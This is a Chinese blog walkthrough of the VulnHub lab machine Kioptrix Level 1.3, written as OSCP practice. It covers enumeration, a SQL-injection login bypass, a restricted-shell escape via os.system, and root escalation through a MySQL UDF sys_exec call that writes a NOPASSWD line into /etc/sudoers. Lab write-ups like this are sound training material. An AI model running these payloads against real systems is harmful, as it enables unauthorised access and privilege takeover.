oscp——Kioptrix: Level 1.3 (#4)

0x00 目标资料 36

链接

https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

难度推荐 4

  • 思路 1
  • 端口 0.5
  • web——usershell 1
  • usershell——rootshell 1.5

环境搭建

  • VMware

下载下来之后是一个vmdx的文件,所以要经过处理

这里新建一个虚拟机,选择其他

移除原来的硬盘

加载下载好的硬盘

然后开机即可,这里需要注意的是,内存分配也要进行修改

0x01 信息收集

ip

masscan 192.168.25.1/24 --ping --rate 1000000000000000000000000000000

端口

nmap -A 192.168.25.213

0x02 samba

目标开启了1349和445,samba可以通过enum4linux进行扫描一下

enum4linux -a -o 目标

20200224174620.png

这里看到有以下用户

loneferret
robert
john

0x03 web——usershell

这里访问一下目标的站点,可以看到的是一个登录框

20200224171850.png

登录框一般猜解弱口令猜解,或者测试是否存在注入

这里先测试一下万能密码,可以看到进入到下图页面

admin
' or '1'='1

20200224180712.png

这里看到返回一个url

http://192.168.25.213/member.php?username=admin

这里对url里的username进行修改,修改为john时,可以看到显示了一个密码(测试发现,不论是robert还是john都会返回如下结果)

Username 	: 	john
Password 	: 	MyNameIsJohn

20200224181059.png

这里使用获取到的账号密码进行ssh连接

20200224181329.png

这里连接之后发现问题,很多命令都无法进行执行

20200224182858.png

使用如下命令获取tty

echo os.system('/bin/bash')

20200224182940.png

0x04 usershell——rootshell

这里我们在/var/www/目录下的checklogin.php文件里发现了mysql的账号和密码

20200224205746.png

进行连接

 mysql -u root -p

20200224205834.png

这里使用udf进行提权

select sys_exec('echo "john ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers');

20200224210227.png

拿到flag

20200224210300.png

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页